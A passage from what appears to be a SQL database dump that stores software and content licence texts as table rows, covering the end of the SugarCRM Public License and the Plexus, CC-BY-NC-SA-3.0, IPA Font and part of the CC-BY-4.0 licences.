DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. GOVERNMENT END USERS.\n\nThe Covered Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\" as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in the United States\nof America, any litigation relating to this License shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys\' fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. RESPONSIBILITY FOR CLAIMS.\n\nAs between Initial Developer and the Contributors, each party is responsible\nfor claims and damages arising, directly or indirectly, out of its utilization\nof rights under this License and You agree to work with Initial Developer\nand Contributors to distribute such responsibility on an equitable basis.\nNothing herein is intended or shall be deemed to constitute any admission\nof liability.\n\n 13. MULTIPLE-LICENSED CODE.\n\nInitial Developer may designate portions of the Covered Code as \"Multiple-Licensed\".\n\"Multiple-Licensed\" means that the Initial Developer permits you to utilize\nportions of the Covered Code under Your choice of the SPL or the alternative\nlicenses, if any, specified by the Initial Developer in the file described\nin Exhibit A. SugarCRM Public License 1.1.3 - Exhibit A\n\nThe contents of this file are subject to the SugarCRM Public License Version\n1.1.3 (\"License\"); You may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at http://www.sugarcrm.com/SPL\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is: SugarCRM Open Source\n\nThe Initial Developer of the Original Code is SugarCRM, Inc.\n\nPortions created by SugarCRM are Copyright (C) 2004 SugarCRM, Inc.;\n\nAll Rights Reserved.\n\nContributor(s): ______________________________________.\n\n[NOTE: The text of this Exhibit A may differ slightly from the text of the\nnotices in the Source Code files of the Original Code. You should use the\ntext of this Exhibit A rather than the text found in the Original Code Source\nCode for Your Modifications.]\n\nSugarCRM Public License 1.1.3 - Exhibit B\n\nAdditional Terms applicable to the SugarCRM Public License.\n\n I. Effect.,\n\nThese additional terms described in this SugarCRM Public License - Additional\nTerms shall apply to the Covered Code under this License.\n\n II. SugarCRM and logo.\n\nThis License does not grant any rights to use the trademarks \"SugarCRM\" and\nthe \"SugarCRM\" logos even if such marks are included in the Original Code\nor Modifications.\n\nHowever, in addition to the other notice obligations, all copies of the Covered\nCode in Executable and Source Code form distributed must, as a form of attribution\nof the original author, include on each user interface screen (i) the \"Powered\nby SugarCRM\" logo and (ii) the copyright notice in the same form as the latest\nversion of the Covered Code distributed by SugarCRM, Inc. at the time of distribution\nof such copy. In addition, the \"Powered by SugarCRM\" logo must be visible\nto all users and be located at the very bottom center of each user interface\nscreen. Notwithstanding the above, the dimensions of the \"Powered By SugarCRM\"\nlogo must be at least 106 x 23 pixels. When users click on the \"Powered by\nSugarCRM\" logo it must direct them back to http://www.sugarforge.org. In addition,\nthe copyright notice must remain visible to all users at all times at the\nbottom of the user interface screen. When users click on the copyright notice,\nit must direct them back to http://www.sugarcrm.com\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(172,'Plexus','Copyright 2002 (C) The Codehaus . All Rights Reserved.\n\nRedistribution and use of this software and associated documentation (\"Software\"),\nwith or without modification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain copyright statements and notices.\nRedistributions must also contain a copy of this document.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The name \"classworlds\" must not be used to endorse or promote products\nderived from this Software without prior written permission of The Codehaus\n. For written permission, please contact bob@codehaus.org .\n\n4. Products derived from this Software may not be called \"classworlds\" nor\nmay \"classworlds\" appear in their names without prior written permission of\nThe Codehaus . \"classworlds\" is a registered trademark of The Codehaus .\n\n5. Due credit should be given to The Codehaus. (http://classworlds.codehaus.org/)\n.\n\nTHIS SOFTWARE IS PROVIDED BY THE CODEHAUS AND CONTRIBUTORS ``AS IS\'\' AND ANY\nEXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\nIN NO EVENT SHALL THE CODEHAUS OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\nBUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\nOF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(173,'CC-BY-NC-SA-3.0','Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported CREATIVE\nCOMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES.\nDISTRIBUTION OF THIS LICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP.\nCREATIVE COMMONS PROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS\nMAKES NO WARRANTIES REGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY\nFOR DAMAGES RESULTING FROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. TO THE EXTENT THIS LICENSE MAY BE CONSIDERED\nTO BE A CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION\nOF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Adaptation\" means a work based upon the Work, or upon the Work and other\npre-existing works, such as a translation, adaptation, derivative work, arrangement\nof music or other alterations of a literary or artistic work, or phonogram\nor performance and includes cinematographic adaptations or any other form\nin which the Work may be recast, transformed, or adapted including in any\nform recognizably derived from the original, except that a work that constitutes\na Collection will not be considered an Adaptation for the purpose of this\nLicense. For the avoidance of doubt, where the Work is a musical work, performance\nor phonogram, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered an Adaptation for the purpose of this\nLicense.\n\nb. \"Collection\" means a collection of literary or artistic works, such as\nencyclopedias and anthologies, or performances, phonograms or broadcasts,\nor other works or subject matter other than works listed in Section 1(g) below,\nwhich, by reason of the selection and arrangement of their contents, constitute\nintellectual creations, in which the Work is included in its entirety in unmodified\nform along with one or more other contributions, each constituting separate\nand independent works in themselves, which together are assembled into a collective\nwhole. A work that constitutes a Collection will not be considered an Adaptation\n(as defined above) for the purposes of this License.\n\nc. \"Distribute\" means to make available to the public the original and copies\nof the Work or Adaptation, as appropriate, through sale or other transfer\nof ownership.\n\nd. \"License Elements\" means the following high-level license attributes as\nselected by Licensor and indicated in the title of this License: Attribution,\nNoncommercial, ShareAlike.\n\ne. \"Licensor\" means the individual, individuals, entity or entities that offer(s)\nthe Work under the terms of this License.\n\nf. \"Original Author\" means, in the case of a literary or artistic work, the\nindividual, individuals, entity or entities who created the Work or if no\nindividual or entity can be identified, the publisher; and in addition (i)\nin the case of a performance the actors, singers, musicians, dancers, and\nother persons who act, sing, deliver, declaim, play in, interpret or otherwise\nperform literary or artistic works or expressions of folklore; (ii) in the\ncase of a phonogram the producer being the person or legal entity who first\nfixes the sounds of a performance or other sounds; and, (iii) in the case\nof broadcasts, the organization that transmits the broadcast.\n\ng. \"Work\" means the literary and/or artistic work offered under the terms\nof this License including without limitation any production in the literary,\nscientific and artistic domain, whatever may be the mode or form of its expression\nincluding digital form, such as a book, pamphlet and other writing; a lecture,\naddress, sermon or other work of the same nature; a dramatic or dramatico-musical\nwork; a choreographic work or entertainment in dumb show; a musical composition\nwith or without words; a cinematographic work to which are assimilated works\nexpressed by a process analogous to cinematography; a work of drawing, painting,\narchitecture, sculpture, engraving or lithography; a photographic work to\nwhich are assimilated works expressed by a process analogous to photography;\na work of applied art; an illustration, map, plan, sketch or three-dimensional\nwork relative to geography, topography, architecture or science; a performance;\na broadcast; a phonogram; a compilation of data to the extent it is protected\nas a copyrightable work; or a work performed by a variety or circus performer\nto the extent it is not otherwise considered a literary or artistic work.\n\nh. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\ni. \"Publicly Perform\" means to perform public recitations of the Work and\nto communicate to the public those public recitations, by any means or process,\nincluding by wire or wireless means or public digital performances; to make\navailable to the public Works in such a way that members of the public may\naccess these Works from a place and at a place individually chosen by them;\nto perform the Work to the public by any means or process and the communication\nto the public of the performances of the Work, including by public digital\nperformance; to broadcast and rebroadcast the Work by any means including\nsigns, sounds or images.\n\nj. \"Reproduce\" means to make copies of the Work by any means including without\nlimitation by sound or visual recordings and the right of fixation and reproducing\nfixations of the Work, including storage of a protected performance or phonogram\nin digital form or other electronic medium.\n\n2. Fair Dealing Rights. Nothing in this License is intended to reduce, limit,\nor restrict any uses free from copyright or rights arising from limitations\nor exceptions that are provided for in connection with the copyright protection\nunder copyright law or other applicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to Reproduce the Work, to incorporate the Work into one or more Collections,\nand to Reproduce the Work as incorporated in the Collections;\n\nb. to create and Reproduce Adaptations provided that any such Adaptation,\nincluding any translation in any medium, takes reasonable steps to clearly\nlabel, demarcate or otherwise identify that changes were made to the original\nWork. For example, a translation could be marked \"The original work was translated\nfrom English to Spanish,\" or a modification could indicate \"The original work\nhas been modified.\";\n\nc. to Distribute and Publicly Perform the Work including as incorporated in\nCollections; and,\n\n d. to Distribute and Publicly Perform Adaptations.\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nSubject to Section 8(f), all rights not expressly granted by Licensor are\nhereby reserved, including but not limited to the rights described in Section\n4(e).\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may Distribute or Publicly Perform the Work only under the terms of\nthis License. You must include a copy of, or the Uniform Resource Identifier\n(URI) for, this License with every copy of the Work You Distribute or Publicly\nPerform. You may not offer or impose any terms on the Work that restrict the\nterms of this License or the ability of the recipient of the Work to exercise\nthe rights granted to that recipient under the terms of the License. You may\nnot sublicense the Work. You must keep intact all notices that refer to this\nLicense and to the disclaimer of warranties with every copy of the Work You\nDistribute or Publicly Perform. When You Distribute or Publicly Perform the\nWork, You may not impose any effective technological measures on the Work\nthat restrict the ability of a recipient of the Work from You to exercise\nthe rights granted to that recipient under the terms of the License. This\nSection 4(a) applies to the Work as incorporated in a Collection, but this\ndoes not require the Collection apart from the Work itself to be made subject\nto the terms of this License. If You create a Collection, upon notice from\nany Licensor You must, to the extent practicable, remove from the Collection\nany credit as required by Section 4(d), as requested. If You create an Adaptation,\nupon notice from any Licensor You must, to the extent practicable, remove\nfrom the Adaptation any credit as required by Section 4(d), as requested.\n\nb. You may Distribute or Publicly Perform an Adaptation only under: (i) the\nterms of this License; (ii) a later version of this License with the same\nLicense Elements as this License; (iii) a Creative Commons jurisdiction license\n(either this or a later license version) that contains the same License Elements\nas this License (e.g., Attribution-NonCommercial-ShareAlike 3.0 US) (\"Applicable\nLicense\"). You must include a copy of, or the URI, for Applicable License\nwith every copy of each Adaptation You Distribute or Publicly Perform. You\nmay not offer or impose any terms on the Adaptation that restrict the terms\nof the Applicable License or the ability of the recipient of the Adaptation\nto exercise the rights granted to that recipient under the terms of the Applicable\nLicense. You must keep intact all notices that refer to the Applicable License\nand to the disclaimer of warranties with every copy of the Work as included\nin the Adaptation You Distribute or Publicly Perform. When You Distribute\nor Publicly Perform the Adaptation, You may not impose any effective technological\nmeasures on the Adaptation that restrict the ability of a recipient of the\nAdaptation from You to exercise the rights granted to that recipient under\nthe terms of the Applicable License. This Section 4(b) applies to the Adaptation\nas incorporated in a Collection, but this does not require the Collection\napart from the Adaptation itself to be made subject to the terms of the Applicable\nLicense.\n\nc. You may not exercise any of the rights granted to You in Section 3 above\nin any manner that is primarily intended for or directed toward commercial\nadvantage or private monetary compensation. The exchange of the Work for other\ncopyrighted works by means of digital file-sharing or otherwise shall not\nbe considered to be intended for or directed toward commercial advantage or\nprivate monetary compensation, provided there is no payment of any monetary\ncompensation in con-nection with the exchange of copyrighted works.\n\nd. If You Distribute, or Publicly Perform the Work or any Adaptations or Collections,\nYou must, unless a request has been made pursuant to Section 4(a), keep intact\nall copyright notices for the Work and provide, reasonable to the medium or\nmeans You are utilizing: (i) the name of the Original Author (or pseudonym,\nif applicable) if supplied, and/or if the Original Author and/or Licensor\ndesignate another party or parties (e.g., a sponsor institute, publishing\nentity, journal) for attribution (\"Attribution Parties\") in Licensor\'s copyright\nnotice, terms of service or by other reasonable means, the name of such party\nor parties; (ii) the title of the Work if supplied; (iii) to the extent reasonably\npracticable, the URI, if any, that Licensor specifies to be associated with\nthe Work, unless such URI does not refer to the copyright notice or licensing\ninformation for the Work; and, (iv) consistent with Section 3(b), in the case\nof an Adaptation, a credit identifying the use of the Work in the Adaptation\n(e.g., \"French translation of the Work by Original Author,\" or \"Screenplay\nbased on original Work by Original Author\"). The credit required by this Section\n4(d) may be implemented in any reasonable manner; provided, however, that\nin the case of a Adaptation or Collection, at a minimum such credit will appear,\nif a credit for all contributing authors of the Adaptation or Collection appears,\nthen as part of these credits and in a manner at least as prominent as the\ncredits for the other contributing authors. For the avoidance of doubt, You\nmay only use the credit required by this Section for the purpose of attribution\nin the manner set out above and, by exercising Your rights under this License,\nYou may not implicitly or explicitly assert or imply any connection with,\nsponsorship or endorsement by the Original Author, Licensor and/or Attribution\nParties, as appropriate, of You or Your use of the Work, without the separate,\nexpress prior written permission of the Original Author, Licensor and/or Attribution\nParties.\n\n e. For the avoidance of doubt:\n\ni. Non-waivable Compulsory License Schemes. In those jurisdictions in which\nthe right to collect royalties through any statutory or compulsory licensing\nscheme cannot be waived, the Licensor reserves the exclusive right to collect\nsuch royalties for any exercise by You of the rights granted under this License;\n\nii. Waivable Compulsory License Schemes. In those jurisdictions in which the\nright to collect royalties through any statutory or compulsory licensing scheme\ncan be waived, the Licensor reserves the exclusive right to collect such royalties\nfor any exercise by You of the rights granted under this License if Your exercise\nof such rights is for a purpose or use which is otherwise than noncommercial\nas permitted under Section 4(c) and otherwise waives the right to collect\nroyalties through any statutory or compulsory licensing scheme; and,\n\niii. Voluntary License Schemes. The Licensor reserves the right to collect\nroyalties, whether individually or, in the event that the Licensor is a member\nof a collecting society that administers voluntary licensing schemes, via\nthat society, from any exercise by You of the rights granted under this License\nthat is for a purpose or use which is otherwise than noncommercial as permitted\nunder Section 4(c).\n\nf. Except as otherwise agreed in writing by the Licensor or as may be otherwise\npermitted by applicable law, if You Reproduce, Distribute or Publicly Perform\nthe Work either by itself or as part of any Adaptations or Collections, You\nmust not distort, mutilate, modify or take other derogatory action in relation\nto the Work which would be prejudicial to the Original Author\'s honor or reputation.\nLicensor agrees that in those jurisdictions (e.g. Japan), in which any exercise\nof the right granted in Section 3(b) of this License (the right to make Adaptations)\nwould be deemed to be a distortion, mutilation, modification or other derogatory\naction prejudicial to the Original Author\'s honor and reputation, the Licensor\nwill waive or not assert, as appropriate, this Section, to the fullest extent\npermitted by the applicable national law, to enable You to reasonably exercise\nYour right under Section 3(b) of this License (right to make Adaptations)\nbut not otherwise.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING AND TO THE FULLEST\nEXTENT PERMITTED BY APPLICABLE LAW, LICENSOR OFFERS THE WORK AS-IS AND MAKES\nNO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING THE WORK, EXPRESS,\nIMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nOF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT,\nOR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE\nOF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE\nEXCLUSION OF IMPLIED WARRANTIES, SO THIS EXCLUSION MAY NOT APPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Adaptations or Collections from You under this License,\nhowever, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You Distribute or Publicly Perform the Work or a Collection,\nthe Licensor offers to the recipient a license to the Work on the same terms\nand conditions as the license granted to You under this License.\n\nb. Each time You Distribute or Publicly Perform an Adaptation, Licensor offers\nto the recipient a license to the original Work on the same terms and conditions\nas the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nf. The rights granted under, and the subject matter referenced, in this License\nwere drafted utilizing the terminology of the Berne Convention for the Protection\nof Literary and Artistic Works (as amended on September 28, 1979), the Rome\nConvention of 1961, the WIPO Copyright Treaty of 1996, the WIPO Performances\nand Phonograms Treaty of 1996 and the Universal Copyright Convention (as revised\non July 24, 1971). These rights and subject matter take effect in the relevant\njurisdiction in which the License terms are sought to be enforced according\nto the corresponding provisions of the implementation of those treaty provisions\nin the applicable national law. If the standard suite of rights granted under\napplicable copyright law includes additional rights not granted under this\nLicense, such additional rights are deemed to be included in the License;\nthis License is not intended to restrict the license of any rights under applicable\nlaw.\n\nCreative Commons Notice\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, Creative Commons does not authorize the use by either\nparty of the trademark \"Creative Commons\" or any related trademark or logo\nof Creative Commons without the prior written consent of Creative Commons.\nAny permitted use will be in compliance with Creative Commons\' then-current\ntrademark usage guidelines, as may be published on its website or otherwise\nmade available upon request from time to time. For the avoidance of doubt,\nthis trademark restriction does not form part of this License.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(174,'IPA','IPA Font License Agreement v1.0\n\nThe Licensor provides the Licensed Program (as defined in Article 1 below)\nunder the terms of this license agreement (\"Agreement\"). Any use, reproduction\nor distribution of the Licensed Program, or any exercise of rights under this\nAgreement by a Recipient (as defined in Article 1 below) constitutes the Recipient\'s\nacceptance of this Agreement.\n\nArticle 1 (Definitions)\n\n1. \"Digital Font Program\" shall mean a computer program containing, or used\nto render or display fonts.\n\n2. \"Licensed Program\" shall mean a Digital Font Program licensed by the Licensor\nunder this Agreement.\n\n3. \"Derived Program\" shall mean a Digital Font Program created as a result\nof a modification, addition, deletion, replacement or any other adaptation\nto or of a part or all of the Licensed Program, and includes a case where\na Digital Font Program newly created by retrieving font information from a\npart or all of the Licensed Program or Embedded Fonts from a Digital Document\nFile with or without modification of the retrieved font information.\n\n4. \"Digital Content\" shall mean products provided to end users in the form\nof digital data, including video content, motion and/or still pictures, TV\nprograms or other broadcasting content and products consisting of character\ntext, pictures, photographic images, graphic symbols and/or the like.\n\n5. \"Digital Document File\" shall mean a PDF file or other Digital Content\ncreated by various software programs in which a part or all of the Licensed\nProgram becomes embedded or contained in the file for the display of the font\n(\"Embedded Fonts\"). Embedded Fonts are used only in the display of characters\nin the particular Digital Document File within which they are embedded, and\nshall be distinguished from those in any Digital Font Program, which may be\nused for display of characters outside that particular Digital Document File.\n\n 6. \"Computer\" shall include a server in this Agreement.\n\n7. \"Reproduction and Other Exploitation\" shall mean reproduction, transfer,\ndistribution, lease, public transmission, presentation, exhibition, adaptation\nand any other exploitation.\n\n8. \"Recipient\" shall mean anyone who receives the Licensed Program under this\nAgreement, including one that receives the Licensed Program from a Recipient.\n\nArticle 2 (Grant of License)\n\nThe Licensor grants to the Recipient a license to use the Licensed Program\nin any and all countries in accordance with each of the provisions set forth\nin this Agreement. However, any and all rights underlying in the Licensed\nProgram shall be held by the Licensor. In no sense is this Agreement intended\nto transfer any right relating to the Licensed Program held by the Licensor\nexcept as specifically set forth herein or any right relating to any trademark,\ntrade name, or service mark to the Recipient.\n\n1. The Recipient may install the Licensed Program on any number of Computers\nand use the same in accordance with the provisions set forth in this Agreement.\n\n2. The Recipient may use the Licensed Program, with or without modification\nin printed materials or in Digital Content as an expression of character texts\nor the like.\n\n3. The Recipient may conduct Reproduction and Other Exploitation of the printed\nmaterials and Digital Content created in accordance with the preceding Paragraph,\nfor commercial or non-commercial purposes and in any form of media including\nbut not limited to broadcasting, communication and various recording media.\n\n4. If any Recipient extracts Embedded Fonts from a Digital Document File to\ncreate a Derived Program, such Derived Program shall be subject to the terms\nof this agreement.\n\n5. If any Recipient performs Reproduction or Other Exploitation of a Digital\nDocument File in which Embedded Fonts of the Licensed Program are used only\nfor rendering the Digital Content within such Digital Document File then such\nRecipient shall have no further obligations under this Agreement in relation\nto such actions.\n\n6. The Recipient may reproduce the Licensed Program as is without modification\nand transfer such copies, publicly transmit or otherwise redistribute the\nLicensed Program to a third party for commercial or non-commercial purposes\n(\"Redistribute\"), in accordance with the provisions set forth in Article 3\nParagraph 2.\n\n7. The Recipient may create, use, reproduce and/or Redistribute a Derived\nProgram under the terms stated above for the Licensed Program: provided, that\nthe Recipient shall follow the provisions set forth in Article 3 Paragraph\n1 when Redistributing the Derived Program.\n\nArticle 3 (Restriction)\n\nThe license granted in the preceding Article shall be subject to the following\nrestrictions:\n\n1. If a Derived Program is Redistributed pursuant to Paragraph 4 and 7 of\nthe preceding Article, the following conditions must be met :\n\n(1) The following must be also Redistributed together with the Derived Program,\nor be made available online or by means of mailing mechanisms in exchange\nfor a cost which does not exceed the total costs of postage, storage medium\nand handling fees:\n\n (a) a copy of the Derived Program; and\n\n(b) any additional file created by the font developing program in the course\nof creating the Derived Program that can be used for further modification\nof the Derived Program, if any.\n\n(2) It is required to also Redistribute means to enable recipients of the\nDerived Program to replace the Derived Program with the Licensed Program first\nreleased under this License (the \"Original Program\"). Such means may be to\nprovide a difference file from the Original Program, or instructions setting\nout a method to replace the Derived Program with the Original Program.\n\n(3) The Recipient must license the Derived Program under the terms and conditions\nof this Agreement.\n\n(4) No one may use or include the name of the Licensed Program as a program\nname, font name or file name of the Derived Program.\n\n(5) Any material to be made available online or by means of mailing a medium\nto satisfy the requirements of this paragraph may be provided, verbatim, by\nany party wishing to do so.\n\n2. If the Recipient Redistributes the Licensed Program pursuant to Paragraph\n6 of the preceding Article, the Recipient shall meet all of the following\nconditions:\n\n (1) The Recipient may not change the name of the Licensed Program.\n\n (2) The Recipient may not alter or otherwise modify the Licensed Program.\n\n(3) The Recipient must attach a copy of this Agreement to the Licensed Program.\n\n3. THIS LICENSED PROGRAM IS PROVIDED BY THE LICENSOR \"AS IS\" AND ANY EXPRESSED\nOR IMPLIED WARRANTY AS TO THE LICENSED PROGRAM OR ANY DERIVED PROGRAM, INCLUDING,\nBUT NOT LIMITED TO, WARRANTIES OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY,\nOR FITNESS FOR A PARTICULAR PURPOSE, ARE DISCLAIMED. IN NO EVENT SHALL THE\nLICENSOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXTENDED,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO; PROCUREMENT\nOF SUBSTITUTED GOODS OR SERVICE; DAMAGES ARISING FROM SYSTEM FAILURE; LOSS\nOR CORRUPTION OF EXISTING DATA OR PROGRAM; LOST PROFITS), HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE INSTALLATION,\nUSE, THE REPRODUCTION OR OTHER EXPLOITATION OF THE LICENSED PROGRAM OR ANY\nDERIVED PROGRAM OR THE EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED\nOF THE POSSIBILITY OF SUCH DAMAGES.\n\n4. The Licensor is under no obligation to respond to any technical questions\nor inquiries, or provide any other user support in connection with the installation,\nuse or the Reproduction and Other Exploitation of the Licensed Program or\nDerived Programs thereof.\n\nArticle 4 (Termination of Agreement)\n\n1. The term of this Agreement shall begin from the time of receipt of the\nLicensed Program by the Recipient and shall continue as long as the Recipient\nretains any such Licensed Program in any way.\n\n2. Notwithstanding the provision set forth in the preceding Paragraph, in\nthe event of the breach of any of the provisions set forth in this Agreement\nby the Recipient, this Agreement shall automatically terminate without any\nnotice. In the case of such termination, the Recipient may not use or conduct\nReproduction and Other Exploitation of the Licensed Program or a Derived Program:\nprovided that such termination shall not affect any rights of any other Recipient\nreceiving the Licensed Program or the Derived Program from such Recipient\nwho breached this Agreement.\n\nArticle 5 (Governing Law)\n\n1. IPA may publish revised and/or new versions of this License. In such an\nevent, the Recipient may select either this Agreement or any subsequent version\nof the Agreement in using, conducting the Reproduction and Other Exploitation\nof, or Redistributing the Licensed Program or a Derived Program. Other matters\nnot specified above shall be subject to the Copyright Law of Japan and other\nrelated laws and regulations of Japan.\n\n 2. This Agreement shall be construed under the laws of Japan.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(175,'CC-BY-4.0','Creative Commons Attribution 4.0 International Creative Commons Corporation\n(\"Creative Commons\") is not a law firm and does not provide legal services\nor legal advice. Distribution of Creative Commons public licenses does not\ncreate a lawyer-client or other relationship. Creative Commons makes its licenses\nand related information available on an \"as-is\" basis. Creative Commons gives\nno warranties regarding its licenses, any material licensed under their terms\nand conditions, or any related information. Creative Commons disclaims all\nliability for damages resulting from their use to the fullest extent possible.\n\nUsing Creative Commons Public Licenses\n\nCreative Commons public licenses provide a standard set of terms and conditions\nthat creators and other rights holders may use to share original works of\nauthorship and other material subject to copyright and certain other rights\nspecified in the public license below. The following considerations are for\ninformational purposes only, are not exhaustive, and do not form part of our\nlicenses.\n\nConsiderations for licensors: Our public licenses are intended for use by\nthose authorized to give the public permission to use material in ways otherwise\nrestricted by copyright and certain other rights. Our licenses are irrevocable.\nLicensors should read and understand the terms and conditions of the license\nthey choose before applying it. Licensors should also secure all rights necessary\nbefore applying our licenses so that the public can reuse the material as\nexpected. Licensors should clearly mark any material not subject to the license.\nThis includes 